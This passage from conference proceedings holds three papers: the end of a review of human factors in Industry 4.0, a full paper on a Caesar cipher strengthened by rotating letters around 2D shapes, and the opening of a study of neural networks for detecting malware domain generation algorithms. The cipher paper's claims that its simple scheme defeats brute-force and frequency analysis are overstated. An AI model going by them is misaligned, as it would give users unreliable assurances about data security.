Fig. 5. Repartition of selected papers per theme

In conclusion, from the figure above, 72.7% of the selected papers treat only human factors and their impact on different domains, which will be detailed afterwards; 12.1% of those papers treated only Industry 4.0; and, finally, 15.2% of the papers treated the relationship between human factors and Industry 4.0. Hence the need to highlight the subject once again, "the impact of the human factor in Industry 4.0", given the scarcity of papers treating both and showing the impact of the human factor in Industry 4.0, especially on production systems 4.0.


This fourth revolution has become a trend and a purpose for all types of industries, since it affects productivity and efficiency positively. According to the corpus obtained after this literature review, the 72.7% of papers that studied the human factor cover various fields, distributed as follows (Fig. 6):

Fig. 6. Repartition of selected papers related to human factors by domain

As a comment on the graph above, we can conclude that the largest portion of the domains where the human factor was treated is medicine and health care, followed by manufacturing systems with 13.8%, and then Industry 4.0. Focusing on the 13.8%, since it is our principal subject, major authors confirmed the systematic impact of the human factor on the performance and productivity of systems. In terms of the types of HF aspects that have been considered in the presented papers, we observed a strong tendency to investigate physical HF such as human energy expenditure and physical fatigue, which have been considered, for example, as constraints in analytical models. Fewer works focused on perceptual, mental, or psychosocial aspects [8].

5 Challenges of the Human Factor The study of human factors is defined as the scientific discipline concerned with the understanding of interactions between humans and the other elements of a system, and the profession that applies theory, principles, data and methods to design in order to optimise human well-being and overall system performance [10]. In relation to the fourth revolution, Industry 4.0 and digital transformation are fundamentally reshaping the ways of working for human resources [9]. Consequently, here are some impacts of Industry 4.0 on the human factor:


• The number of jobs in manufacturing will decrease due to automation, but new jobs will be created around the machines [8].
• Human tasks will become more complex, and digitalisation enables high-skilled employees to be provided with a variety of tasks in addition to their core tasks [8].
• Humans should be provided with more possibilities for autonomous decision-making, work diversity, and social interaction [8].
• Humans are also seen as having values, attitudes, and respect for others, attributes that separate them from technological devices, and this should be emphasised in management processes [8].

6 Challenges of New Technologies It is broadly accepted that Industry 4.0 technologies and applications are still in their infancy. The potential economic benefits of Industry 4.0 may be offset by a few major challenges. Some key challenges have to do with scientific, technological and societal issues: technical aspects of the technology, security and privacy, and standardisation. Efforts are needed to address these challenges [12].
• New technologies may incur new kinds of problems for operators due to insufficient information provided by the manufacturing systems; more attention should be paid to the design of interfaces between humans and new technology, and to integrating these design aspects into manufacturing processes [8].
• Complex technologies may lead to unintended uses by humans if usability and cognitive processes are neglected in the design phase [8].
• A gap between the needs and wishes of operators in new technology transformation might exist, and too much emphasis may be placed on managers' visions of digitalisation and technological transformation [8].
• Digitalisation, robotisation and the extended use of assistive technologies, such as exoskeletons and smart gesture control systems, may lead to more efficient work, as humans no longer need to lose time on non-productive actions like waiting and searching [8].

7 Analysis and Discussions According to the synthesis of each selected article, the human factor and its impact were treated in different domains; medicine and health care comes first, since its impact can be considered critical because it touches human life directly. In addition, the impact of the human factor was also addressed in manufacturing systems, which were the subject of a number of papers; Industry 4.0 was part of those articles, even if with a small portion. This literature analysis also revealed that, despite the advantages and benefits of the fourth revolution for system performance, humans cannot be eliminated from manufacturing processes; they are always there and play different roles than in the previous revolutions: the human/operator/user is employed to verify system/machine startup, forecast


and intervene in case of necessity, describe what should be done in case of an abnormal condition, escalate a downtime problem, rely on another operator for input, etc. However, these new tasks will be more complicated, requiring more training and solid abilities and skills, since they consist of managing the system and maintaining good communication and links between processes. Nevertheless, these new roles present challenges for both humans and industries and can also introduce new types of threats to human well-being and, indirectly, to the system's performance.

8 Conclusions Throughout this paper, we started by giving an overview of Industry 4.0 based on the literature review; we then treated the human factor, the domains in which the authors signalled those factors and the major ones impacting system performance, and finally the challenges of both the human factor and Industry 4.0. We can conclude, based on the corpus, that human factors have long been an open issue in the analysis of system performance, since most industries do not include humans from the beginning of the design of their systems. If HF in system design and management are not appropriately considered, then poor system performance can be expected. This conceptual framework has been validated in case research in a variety of manufacturing contexts [13]. Consequently, important attention should be given to those factors, since they can systematically impact productivity and efficiency; this failure to attend to HF in I4.0 research has been observed in previous industrial system generations and has had negative consequences for individual employees, production organisations, and society as a whole [13]. To do so, and in order to have a representative vision of the impact of human factors on the performance of systems, modelling and simulation can play an important role in showing how human-related factors can affect the productivity of production systems 4.0. Our future work will then be based on:
• Identification and qualification of the needs of 4.0 production systems;
• A contribution to the development of a decision-making model that meets the challenges of Industry 4.0, in particular: 1) the determination of useful indicators for industrial decision-makers in targeting objectives; 2) the definition of a decision-making methodology to meet these objectives; 3) the development of a software solution integrating the proposed simulation/optimisation approach;
• Experimentation of solutions and analysis of results in an industrial case.


References
1. Vaidya, S., Ambad, P., Bhosle, S.: Industry 4.0 - a glimpse. In: Procedia Manufacturing, 2nd International Conference on Materials, Manufacturing and Design Engineering (iCMMD 2017), 11–12 December 2017, MIT Aurangabad, Maharashtra, India, pp. 233–238 (2018). https://doi.org/10.1016/j.promfg.2018.02.034
2. Sgarbossa, F., Grosse, E.H., Neumann, W.P., Battini, D., Glock, C.H.: Human factors in production and logistics systems of the future. Annu. Rev. Control 49, 295–305 (2020)
3. El Hamdi, S., Abouabdellah, A., Oudani, M.: Industry 4.0: fundamentals and main challenges. In: 2019 International Colloquium on Logistics and Supply Chain Management (LOGISTIQUA) (2019). https://doi.org/10.1109/LOGISTIQUA.2019.8907280
4. Wilson, J.R.: Fundamentals of systems ergonomics/human factors. Appl. Ergon. 45(1), 5–13 (2014). https://doi.org/10.1016/j.apergo.2013.03.021
5. Dantan, J.-Y., El Mouayni, I., Sadeghi, L., Siadat, A., Etienne, A.: Human factors integration in manufacturing systems design using function–behavior–structure framework and behaviour simulations. CIRP Ann. 68(1), 125–128 (2019). https://doi.org/10.1016/j.cirp.2019.04.040
6. Coraddu, A., Oneto, L., de Maya, B.N., Kurt, R.: Determining the most influential human factors in maritime accidents: a data-driven approach. Ocean Eng. 211, 107588 (2020). https://doi.org/10.1016/j.oceaneng.2020.107588
7. Rollenhagen, C.: From classical human factors toward a system view - experiences from the human factors nuclear field in Sweden. In: Teperi, A.-M., Gotcheva, N. (eds.) Human Factors in the Nuclear Industry, Woodhead Publishing Series in Energy, pp. 55–71. Woodhead Publishing (2021). https://doi.org/10.1016/B978-0-08-102845-2.00003-X
8. Reiman, A., Kaivo-oja, J., Parviainen, E., Takala, E.-P., Lauraeus, T.: Human factors and ergonomics in manufacturing in the industry 4.0 context - a scoping review. Technol. Soc. 65, 101572 (2021). https://doi.org/10.1016/j.techsoc.2021.101572
9. Ghobakhloo, M.: Industry 4.0, digitization, and opportunities for sustainability. J. Clean. Prod. 252, 119869 (2020). https://doi.org/10.1016/j.jclepro.2019.119869
10. Cimini, C., Lagorio, A., Pirola, F., Pinto, R.: Exploring human factors in logistics 4.0: empirical evidence from a case study. In: IFAC-PapersOnLine, 9th IFAC Conference on Manufacturing Modelling, Management and Control (MIM 2019), 52(13), pp. 2183–2188 (2019). https://doi.org/10.1016/j.ifacol.2019.11.529
11. Stern, H., Becker, T.: Development of a model for the integration of human factors in cyber-physical production systems. In: Procedia Manufacturing, 7th Conference on Learning Factories (CLF 2017), vol. 9, pp. 151–158 (2017). https://doi.org/10.1016/j.promfg.2017.04.030
12. Xu, L.D., Xu, E.L., Li, L.: Industry 4.0: state of the art and future trends. Int. J. Prod. Res. 56(8), 2941–2962 (2018)
13. Neumann, W.P., Winkelhaus, S., Grosse, E.H., Glock, C.H.: Industry 4.0 and the human factor - a systems framework and analysis methodology for successful development. Int. J. Prod. Econ. 233, 107992 (2021). https://doi.org/10.1016/j.ijpe.2020.107992

Securing Caesar Cryptography Using the 2D Geometry Fatima Zohra Ben Chakra1(B) , Hamza Touil2 , and Nabil El Akkad1,2 1 LISA, National School of Applied Sciences (ENSA), Sidi Mohamed Ben Abdellah University,

Fez, Morocco {fatimazohra.benchakra,nabil.elakkad}@usmba.ac.ma 2 LISAC, Faculty of Sciences, Dhar-Mahraz (FSDM), Sidi Mohamed Ben Abdellah University, Fez, Morocco [email protected] Abstract. Cryptography has now become a science in its own right, where mathematics, computer science, and sometimes even physics meet to allow secure exchanges between distributed systems, by ensuring the confidentiality, authenticity and integrity of digital information. Throughout this paper, a method of securing the most famous cryptosystem of antiquity will be presented, using 2D geometry. Being at the origin of cryptography, the Caesar cryptosystem presented a very basic method to encrypt messages. However, with the arrival of cryptanalysis, this method is no longer up to date. In fact, a simple exhaustive search can break the entire cryptosystem. Thanks to a hybrid cryptography algorithm inspired by 2D geometry, we overcome this limitation, offering a method to expand the space of possible keys and to manipulate the encrypted message so that an attacker cannot detect the original message. Keywords: Hybrid cryptography · Caesar · 2D Geometry

1 Introduction Nowadays, the biggest concern of technology is the need to enhance security in order to guarantee the CIA triad of information exchange [1, 2]. As a result, we call more and more for techniques that integrate modern cryptographic solutions to improve information protection with minimal impact on system performance. Since its existence, classical cryptography has been known for the variety of methods proposed, based on mathematical functions and associated with parameters called keys. Moreover, classical cryptosystems consist mainly of two elements: the algorithm, or the method of encryption/decryption of the text, and the key; a simple modification of one of these elements automatically implies a change of the cipher text [3], which is called the avalanche effect [4–6]. The efficiency of a cryptosystem lies in the simplicity and invulnerability of the algorithm, as well as the confidentiality and difficulty of disclosing the key. Let us cite the example of the Caesar method, whose encryption consists in putting the letters in disorder by respecting a precise number of shifts in the alphabet, noting that the key is the number of shifts to be made [7, 8]. On the other hand, the decryption of the text is done by


the reverse shift with the same key. The algorithm is simple and understandable enough to begin the science of cryptography, but not to cope with cryptanalysis. Indeed, the limited number of keys makes the system weak and easy to break with a simple exhaustive search of the keys, trying each key until a meaning is found in the original text [9–12]. Other algorithms were proposed afterwards, such as Vigenere and Hill among the classical ciphers, and DES, 3DES and AES among modern symmetric ciphers [13–16]. Each of these has been used to fix specific weaknesses; however, they are no longer sufficient on their own, hence the use of modern cryptography [17, 18]. By using other fields apart from information technology, it is possible to design stronger cryptosystems and take advantage of the benefits offered by both domains. Let us take the example of DNA-based cryptography. In fact, DNA is known to carry information from one generation to the next and is very useful for cryptography [19–21]. Regarding our method, we have taken advantage of the simplicity of 2D geometry properties, applying them to the manipulation of data encrypted by the classical Caesar method, in order to present a secure and strengthened cryptosystem in terms of resistance to known attacks. In the rest of this paper, we will present the related work, and we will explain our method for the encryption phase as well as the decryption one. We will finish with an experimentation of the two phases, addressing the points of resistance to attacks.

2 Related Work A set of studies has been proposed to ensure the CIA model during digital exchanges. In terms of authentication, we can cite, for example, the technique in [22], which secures passwords during online authentication by applying a rotation to the generated hash before storing it in the database, as well as the method proposed in [23], which aims at reinforcing the security of password storage by relying on the random generation of an MD5 hash and then using it to transform the original hash according to predefined rules before storing it in the database. Both methods were designed to withstand forgery attacks. In the hybrid cryptography approach, [3] proposes a combination of two cryptosystems, Vigenere and Hill, a method resistant to several attacks including statistical attacks. We can also add the two methods [6] and [7], combining respectively the two-square cipher with the Caesar cipher, and the Four-Square with Zigzag encryption. Such combinations are generally effective in dealing with the limitations of classical cryptosystems. In terms of real-time exchanges, Touil et al. [24] propose a secure approach that mainly meets the requirements of quality of service over a communication channel by using the robustness and flexibility of the TLS protocol.

3 Proposed Method 3.1 Explanation of the Method We propose a new hybrid encryption method combining the Caesar method and the best-known 2D geometric shapes. First of all, we introduce the text to be encrypted, then we eliminate all the spaces and tabs in order to obtain a homogeneous text that is easy to cut. The first step is then to apply the Caesar method, shifting the letters by a randomly chosen rank. The second step is defined by the choice of a 2D


geometrical shape among a predefined list, so that the number of spikes of the chosen shape is lower than or equal to the size of the text obtained. After that, depending on the number of spikes of the chosen shape, we make a first extraction of the text, and we put the extracted letters on the spikes. Then we make a single clockwise rotation and store the result. We repeat the procedure in the same way, to extract and cut the rest of the text, until the end. Finally, the cipher text is obtained by the concatenation of the stored extracts, and the key is constituted by the Caesar rank and the series of geometric shapes used in each phase of extraction [Fig. 1]. 3.2 Encryption Process As shown in Fig. 1, the encryption phase mainly consists in securing the Caesar method by adding a new layer of text manipulation, so that an attacker cannot detect or disclose the original message. The following is a representation of the different steps:

Fig. 1. Encryption process: introduce the text to encrypt; delete all spaces and tabs to obtain the original text; apply the Caesar cipher, where F is the Caesar key (chosen randomly) and P0 is the output of the Caesar cipher; then repeatedly choose a 2D geometric form randomly from a defined list, where Ni is the number of the form's spikes (Ni ≥ 1). Notation: Ei denotes the first letters extracted from Pi; Ci the result of the rotation after each round; C the final encrypted text (the cipher text); and K the key of the proposed method.

The second phase of our method refers to the securing of the obtained text P0. The algorithm is defined, firstly, by the choice of a 2D geometrical shape among a predefined list, with the condition that the N of the chosen shape must be lower than or equal to the size of P0. The list considered by the algorithm is: segment, triangle, rectangle, pentagon, hexagon, heptagon, octagon, nonagon and star. In the following, we explain the three cases encountered by the algorithm:
• First case: the number of spikes of the chosen form is strictly inferior to the size of the text encrypted by Caesar. In this case, a first extraction must take place based on N, such that E1 represents the first extracted block from P0 and the size of E1 = N. To simplify the comprehension of the algorithm, we take the extracted block E1 and place each letter on the spikes of the chosen 2D geometrical shape, following the clockwise direction. Then, we make a simple rotation of the letters in the clockwise direction. The result obtained will be stored until the end. We repeat the same procedure on the rest of the text after the extraction, P1, starting from the process of choosing another geometric shape. Consider Pi the rest of the extraction after each round i. During each round i, we define the Ni chosen as sub-keys to be sent with the Caesar key, as well as the Ci to be concatenated to obtain the final cipher text, such that:
The key to send: K = [F, N0, N1, …, Ni]
The final cipher text: C = C0 + C1 + … + Ci.


• Second case: the number of spikes of the chosen shape is equal to the size of the text encrypted by Caesar. We directly make a clockwise rotation, assuming that E0 = P0, and we continue the procedure as indicated above.
• Third case: the size of P0, or Pi in general, is equal to 1. It is the final stage, where no action is needed for the letter, and it is stored until the end.
3.3 Decryption Process When the cipher text C and the Ni sub-keys arrive, we execute the inverse of the encryption process. We first proceed by partitioning the text into small blocks Ci, based on the received Ni sub-keys, such that the size of Ci = Ni. Then, we apply a counter-clockwise rotation on each block Ci, and we concatenate the obtained sub-texts to find the P0 encrypted by the Caesar cipher. As a last step, we perform a Caesar decryption, with the predefined rank, to recover the original text. It is indeed a reverse shift by F positions [Fig. 2].

Fig. 2. Decryption process: given the cipher text C and the key K = [F, N0, N1, …, Ni], split C into mini blocks Ci, where the size of Ci = Ni; apply a counter-clockwise rotation on each Ci and concatenate the result as P0; then apply Caesar decryption, where F is the decryption key, to recover the original text.
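To make Sects. 3.2 and 3.3 concrete, the following minimal Python sketch implements the scheme as we read it; the clockwise rotation is modelled as moving the last letter of a block to its front (which reproduces the worked example of Sect. 5, where "FLDWULDGLV" becomes "VFLDWULDGL"), the spike counts assigned to the shapes are our assumption, and all function and variable names are ours rather than the authors'.

```python
import random

# Assumed spike counts for the predefined list of 2D shapes.
SHAPES = {"segment": 2, "triangle": 3, "rectangle": 4, "pentagon": 5,
          "hexagon": 6, "heptagon": 7, "octagon": 8, "nonagon": 9, "star": 10}

def caesar_shift(text, f):
    """Shift each uppercase letter by f positions (classical Caesar cipher)."""
    return "".join(chr((ord(c) - 65 + f) % 26 + 65) for c in text)

def encrypt(plaintext, f=None):
    """Caesar shift, then block extraction and clockwise rotation per chosen shape."""
    text = "".join(plaintext.upper().split())          # delete all spaces and tabs
    f = random.randrange(1, 26) if f is None else f    # Caesar rank F
    p = caesar_shift(text, f)                          # P0
    cipher, key = "", [f]
    while p:
        # choose a shape whose number of spikes fits the remaining text
        candidates = [n for n in SHAPES.values() if n <= len(p)]
        n = random.choice(candidates) if candidates else 1
        block, p = p[:n], p[n:]
        # single clockwise rotation of the letters placed on the spikes
        cipher += block[-1] + block[:-1] if n > 1 else block
        key.append(n)
    return cipher, key

def decrypt(cipher, key):
    """Split into blocks of the received sizes, rotate counter-clockwise, undo Caesar."""
    f, sizes = key[0], key[1:]
    p, pos = "", 0
    for n in sizes:
        block = cipher[pos:pos + n]
        pos += n
        p += block[1:] + block[0] if n > 1 else block  # counter-clockwise rotation
    return caesar_shift(p, -f)                          # reverse shift by F positions
```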


4 Resistance Against Attacks 4.1 Brute Force Attack The brute force attack is considered efficient when the range of possible keys is limited. This is the case of the Caesar cryptosystem, which allows hackers to try all 26 possible positions and disclose the message in a very short time. With our method, finding the key and the associated algorithm is practically infeasible. Indeed, the number of sub-keys depends directly on the length of the message and on the random choices that the algorithm makes. Moreover, increasing the length of the text directly increases the size of the key to be used. 4.2 Frequency Analysis Attack Belonging to the family of mono-alphabetic cryptosystems, the Caesar cryptosystem presents a very important weakness. Indeed, with the shift performed, each letter in the original text is always mapped to the same letter in the cipher text, which makes the detection of the original message easy by doing a simple frequency analysis. Our method addresses this limitation by handling each letter in a different way, depending on the size of the text extracted in each round and on its position during the applied rotation.

5 Experimentation We use the message below to test our proposed method: « CIA TRIAD IS USED IN INFORMATION SECURITY MODEL» By eliminating the spaces, we obtain the following text, whose size is 40 letters: « CIATRIADISUSEDININFORMATIONSECURITYMODEL» 5.1 Encrypting the Original Text Apply the Caesar cipher, choosing F = 3 as the number of positions to shift. The cipher text P0 will be: « FLDWULDGLVXVHGLQLQIRUPDWLRQVHFXULWBPRGHO» 5.2 Securing the Text with the Proposed Algorithm Choose the first geometrical shape. We take, for example, a star, whose number of spikes is 10, so N1 = 10. Make an extraction E1 of P0 (starting from the left side of the text), such that the size of E1 = N1, that is, 10 letters. The E1 obtained is "FLDWULDGLV" and the rest of the text, P1, is "XVHGLQLQIRUPDWLRQVHFXULWBPRGHO".


We place the letters of E1 on the spikes of the geometric shape and execute a clockwise rotation.

Therefore, the C1 obtained is "VFLDWULDGL"; it will be stored until the end. Repeat the same procedure for the remaining text P1. Let us take the example of a triangle, where N2 = 3. The size of E2 = 3 letters. Then, for N2 = 3, E2 = "XVH", which means C2 = "HXV", and P2 = "GLQLQIRUPDWLRQVHFXULWBPRGHO". For the 3rd round, the chosen geometrical shape is a nonagon, where N3 = 9, E3 = "GLQLQIRUP" and P3 = "DWLRQVHFXULWBPRGHO". After the rotation, C3 = "PGLQLQIRU". For the 4th round, the geometrical shape chosen is an octagon, where N4 = 8, E4 = "DWLRQVHF" and P4 = "XULWBPRGHO". After the rotation, C4 = "FDWLRQVH". For the 5th round, the geometrical shape chosen is a nonagon, N5 = 9, E5 = "XULWBPRGH" and P5 = "O". After the rotation, C5 = "HXULWBPRG". For the 6th round, we notice that the size of P5 = 1 letter; this is the third case, so there is no change to make and C6 will be "O", with N6 = 1. The algorithm stops when the size of Pi = 0, so the final cipher text and the key to send will be as follows: C = C1 + C2 + C3 + C4 + C5 + C6. K = [F, N1, N2, N3, N4, N5, N6]. That is: C = « VFLDWULDGLHXVPGLQLQIRUFDWLRQVHHXULWBPRGO» K = [3, 10, 3, 9, 8, 9, 1] The repartition of the text according to the randomly chosen geometrical shapes enables treating each block differently; thus, each letter will not be encrypted by the same letter in the cipher text, thanks to the rotation performed, which prevents the attacker from analyzing the frequency of the repeated letters or from guessing the shift key. Example: the letter C in the first extract is encrypted by the letter V, while in the fourth extract it is encrypted by the letter H. In addition, the key we generated depends mainly on the shapes, and so do the number of partitions made and the size of our cipher text. Therefore, the random choice of geometrical shapes allows us to generate several combinations of sub-keys, and several cipher texts for the same plaintext. For our original text, we can have this key: K = [3, 2,


4, 2, 4, 2, 4, 2, 4, 2, 4, 10], as we can also have the key: K = [3, 10, 10, 10, 10]. Thus, by increasing the size of the plaintext, the key becomes more and more complicated, and the space of the sub-keys increases accordingly. This directly implies the infeasibility of a brute force attack. 5.3 Decryption of the Received Text The strength of our method lies in the fact that, upon receiving the cipher text and the key, the attacker has no way to tell whether the numbers represent a simple division and shift or a more elaborate manipulation, as indicated in the rest of the experimentation. Based on the associated key, we break the text into blocks Ci of size Ni, where: Size of C1 = 10 letters, so that C1 = "VFLDWULDGL". Size of C2 = 3 letters, so that C2 = "HXV". Size of C3 = 9 letters, so that C3 = "PGLQLQIRU". Size of C4 = 8 letters, so that C4 = "FDWLRQVH". Size of C5 = 9 letters, so that C5 = "HXULWBPRG". Size of C6 = 1 letter, so that C6 = "O". Apply a counter-clockwise rotation on each Ci. The result is: E1 = "FLDWULDGLV". E2 = "XVH". E3 = "GLQLQIRUP". E4 = "DWLRQVHF". E5 = "XULWBPRGH". E6 = "O", with no change. Make a concatenation of the Ei found in order to build P0. Then: P0 = "FLDWULDGLVXVHGLQLQIRUPDWLRQVHFXULWBPRGHO". Apply the Caesar decryption, making a reverse shift of 3 positions (first sub-key). The result is: "CIATRIADISUSEDININFORMATIONSECURITYMODEL". By recovering the meaning of the words, we easily find the message sent: "CIA TRIAD IS USED IN INFORMATION SECURITY MODEL".
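Using the sketch given at the end of Sect. 3 (and under the same assumptions), the experiment above can be reproduced end to end; the key and cipher text vary between runs because the shapes are drawn at random, but decryption always recovers the space-free plaintext.

```python
message = "CIA TRIAD IS USED IN INFORMATION SECURITY MODEL"
cipher, key = encrypt(message, f=3)
print(cipher, key)
# With the shape sequence of the worked example (star, triangle, nonagon,
# octagon, nonagon, single letter) one obtains:
#   cipher = "VFLDWULDGLHXVPGLQLQIRUFDWLRQVHHXULWBPRGO"
#   key    = [3, 10, 3, 9, 8, 9, 1]
assert decrypt(cipher, key) == "CIATRIADISUSEDININFORMATIONSECURITYMODEL"
```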

6 Conclusion Based on the modern hybrid cryptography approach, we have proposed an efficient method for securing the Caesar cryptosystem by adding a layer of manipulation to the encrypted message. Our algorithm, inspired by simple properties of 2D geometry, strengthens the security of the message by preventing hackers from decrypting it with the known methods of cryptanalysis and by addressing the weaknesses presented by the Caesar method.


References 1. Sniatala, P., Iyengar, S.S., Ramani, S.K.: Evolution of Smart Sensing Ecosystems with Tamper Evident Security, pp. 3–8. Springer, Cham (2021) 2. Nimbe, P., Weyori, B.A., Adekoya, A.F.: A novel classical and quantum cryptographic scheme for data encryption. Int. J. Theor. Phys. 61(3), 1–49 (2022). https://doi.org/10.1007/s10773022-05054-5 3. Touil, H., El Akkad, N., Satori, K.: Text encryption: hybrid cryptographic method using vigenere and hill ciphers. In: International Conference on Intelligent Systems and Computer Vision (ISCV) (2020) 4. Zulfadly, M., Daifiria,Akbar, M.B., Lazuly, I: Implementation of nihilist cipher algorithm in securing text data with md5 verification. In: Journal of Physics: Conference Series, vol. 1361(1) (2019). Article number 012020 5. El Akkad, N., El Hazzat, S., Saaidi, A., Satori, K.: Reconstruction of 3D scenes by camera self-calibration and using genetic algorithms. 3D Research, 6(7), 1–17 (2016) 6. Elazzaby, F., El Akkad, N., Kabbaj, S.: A new encryption approach based on four squares and Zigzag. In: The 1st International Conference on Embedded Systems and Artificial Intelligence, ESAI (2019) 7. Es-Sabry, M., Akkad, N.E., Merras, M., Saaidi, A., Satori, K.: A novel text encryption algorithm based on the two-square cipher and caesar cipher. Commun. Comput. Inf. Sci. 872, 78–88 (2018) 8. Jain, A., Dedhia, R., Patil, A.: Enhancing the security of Caesar cipher substitution method using a randomized approach for more secure communication. Int. J. Comput. Appl. 129(13), 0975–8887 (2015) 9. Mira, J., Álvarez, J.R. (eds.): IWINAC 2005. LNCS, vol. 3562. Springer, Heidelberg (2005). https://doi.org/10.1007/b137296 10. Verma, R., Dhanda, N., Nagar, V.: Enhancing security with in-depth analysis of brute-force attack on secure hashing algorithms. In: Kaiser, M.S., Bandyopadhyay, A., Ray, K., Singh, R., Nagar, V. (eds.) Proceedings of Trends in Electronics and Health Informatics. LNNS, vol. 376, pp. 513–522. Springer, Singapore (2022). https://doi.org/10.1007/978-981-16-8826-3_44 11. Radu, S., Atallah, M., Prabhakar, S.: Watermarking relational databases (2002) 12. Bibhudendra, A., et al.: Image encryption using advanced hill cipher algorithm. Int. J. Recent Trends Eng 1(1), 663–667 (2009) 13. Singh, G.: A study of encryption algorithms (RSA, DES, 3DES and AES) for information security. Int. J. Comput. Appl. 67(19) (2013) 14. Vincent, D.R.: RSA encryption algorithm - a survey on its various forms and its security level. Int. J. Pharm. Technol. 8(2), 12230–12240 (2016) 15. Bellare, M., Desai, A., Jokipii, E., Rogaway, P.: A concrete security treatment of symmetric encryption: analysis of the DES modes of operation. In: Proceedings of the 38th Symposium on Foundations of Computer Science. IEEE (1997) 16. Luciano, D., Prichett, G.: Cryptology: from caesar ciphers to public-key cryptosystems. Coll. Math. J. 18(1), 2–17 (1987) 17. Mishra, R., Mantri, J.K., Pradhan, S.: New multiphase encryption scheme for better security enhancement. In: Senjyu, T., Mahalle, P., Perumal, T., Joshi, A. (eds.) IOT with Smart Systems. SIST, vol. 251, pp. 599–606. Springer, Singapore (2022). https://doi.org/10.1007/978-98116-3945-6_59 18. Patil, K.S., Mandal, I., Rangaswamy, C.: Hybrid and adaptive cryptographic-based secure authentication approach in IoT based applications using hybrid encryption. Pervasive Mob. Comput. 82, 101552 (2022)


19. Gahlaut, A., Bharti, A., Dogra, Y., Singh, P.: DNA based cryptography. In: Kaushik, S., Gupta, D., Kharb, L., Chahal, D. (eds.) ICICCT 2017. CCIS, vol. 750, pp. 205–215. Springer, Singapore (2017). https://doi.org/10.1007/978-981-10-6544-6_20 20. Pavithran, P., Mathew, S., Namasudra, S., Srivastava, G.: A novel cryptosystem based on DNA cryptography, hyperchaotic systems and a randomly generated Moore machine for cyber physical systems. Comput. Commun. 188, 1–12 (2022) 21. Satir, ¸ E., Kendirli, O.: A symmetric DNA encryption process with a biotechnical hardware. J. King Saud Univ. Sci. 34(3), 101838 (2022) 22. Touil, H., El Akkad, N., Satori, K.: H-rotation: secure storage and retrieval of passphrases on the authentication process. Int. J. Saf. Secur. Eng. 10(6), 785–796 (2021) 23. Touil, H., El Akkad, N., Satori, K.: Securing the storage of passwords based on the MD5 HASH transformation. In: Motahhir, S., Bossoufi, B. (eds.) ICDTA 2021. LNNS, vol. 211, pp. 495–503. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-73882-2_45 24. Touil, H., Akkad, N.E., Satori, K.: Secure and guarantee QoS in a video sequence: a new approach based on TLS protocol to secure data and RTP to ensure real-time exchanges. Int. J. Saf. Secur. Eng. 11(1), 59–68 (2021)

A Comparative Study of Neural Networks Algorithms in Cyber-Security to Detect Domain Generation Algorithms Based on Mixed Classes of Data Mohamed Hassaoui(B) , Mohamed Hanini, and Said El Kafhali Faculty of Sciences and Techniques, Computer, Networks, Mobility and Modeling laboratory (IR2M), Hassan First University of Settat, Settat, Morocco [email protected], [email protected]

Abstract. Domain Generation Algorithms (DGAs) are often used to generate huge amounts of domain names to maintain command and control (C2) between the infected computer and the master bot. Blacklist approaches have become an ineffective way to detect DGAs, as the number of domain names to block is large and varies over time. Since DGA outputs are unpredictably distributed, conventional approaches have trouble detecting them. Several deep learning architectures that accept a series of characters as a raw input signal and automatically classify them have recently been suggested. This paper compares three neural network algorithms used in cyber-security systems to detect domain generation algorithms, in particular long short-term memory (LSTM), convolutional neural networks (CNN) and bidirectional long short-term memory (biLSTM). We examine in detail these three neural network algorithms for detecting DGAs based on mixed classes of DGA data containing more than 30 classes of DGAs, and we discuss the drawbacks and strengths of each method. Keywords: Domain generation algorithms (DGA) · LSTM · BiLSTM · CNN

1 Introduction

Malware is software that infects systems in order to carry out malicious operations that are not authorized. The malware must be able to link to a command and control (C2) center in order to achieve its objectives. To do this, both the botmaster (the controller behind the C&C center) and the malware on the infected devices can use a Domain Generation Algorithm (DGA) to automatically generate hundreds or even thousands of domains. The malware then uses its local DNS server to try to resolve each of these names. One or more of these automatically produced domains will have been registered by the botmaster. For these domains that have actually been registered, the malware will obtain a valid IP address and will be able to communicate with the C2 center.


The binary text classification challenge that we address in this research is to categorize a domain name string as malicious (i.e., generated by a DGA) or benign (i.e., not formed by a DGA). In the literature on DGA identification, deep neural networks have recently surfaced in [1–5]. They outperform typical machine learning methods in terms of accuracy, but at the cost of increasing the model's complexity and requiring larger datasets. Other deep learning approaches for character-based text classification have recently been proposed, including deep neural network architectures designed for processing and classification of tweets [6,7] as well as general natural language text [8–11]. There is no systematic study available that compares the predictive accuracy of all these different deep learning architectures, leaving one to wonder which one works best for DGA detection. To answer this open question, in this paper we compare the performance of three different deep learning architectures for the problem of detecting DGAs. This work can be considered as a general measure to accurately evaluate the performance of the three models when the data is balanced, i.e. the same quantity of data is used for each class of DGA, which was the case for this experiment. However, there was a considerable difference between the methods in terms of accuracy. The remainder of this paper is organized as follows. Section 2 presents a short literature review of DGAs and their extracted features. Section 3 discusses the different neural network methods to detect DGAs. Section 4 focuses on the evaluation methods of models for detecting DGAs and provides a comparative study. Finally, Sect. 5 concludes the paper and presents some future work.

2 Domain Generation Algorithms

As mentioned earlier, domain generation algorithms are used to create a large number of fake domain names in order to hide the command and control server and maintain communication between the botnet and the botmaster, as shown in Fig. 1. If an attacker infects a system with malware and then wants to protect their C2 server, the malware will use the DGA to generate tens of thousands of random domain names, including the C2 server address, which will already be registered. The other domain names serve solely the purpose of obfuscation and concealment. Subsequently, the malware infiltrates and connects to the target device to acquire more commands. In this section, we will see how these DGAs are created, discuss the generated domain categories and which are the most difficult to detect, and see what researchers have found regarding the features of DGAs.

2.1 DGA Structures and Types

The created domains are determined on the basis of a given seed, which may contain numeric variables, the actual date/time, or even Twitter trends. The dynamics of a Domain Generation Algorithm generally rely on this seeding. In other


words, given an input such as date and time, a deterministic output will follow, as the DGA is predefined. The challenge of deterring the DGA approach is the need to identify the malware, the DGA, and the seed in the sequence, in order to filter the current malicious network and possible servers. Since a sophisticated threat actor has the ability to periodically change, in an automated fashion, the server or location that the malware communicates with for C2, the DGA increases the difficulty of controlling malicious communications. The seed functions as a mutual secret necessary for the computation of the generated domains, often referred to as Algorithmically Generated Domains (AGDs). It is the collated set of parameters necessary for the implementation of a DGA. Typical parameters contain numeric constants. Two seed properties are of particular value to describe a DGA:
– Time dependence: the DGA uses a time source for the computation of the domains. As a result, the created domains will have a validity period.
– Determinism: addresses observability and the availability of conditions. For most common DGAs, all parameters needed for the DGA implementation are known, to the point that all possible domains can be determined. Some DGAs use temporary nondeterminism to prevent arbitrary estimation of future AGDs, by using volatile but publicly available seed data.
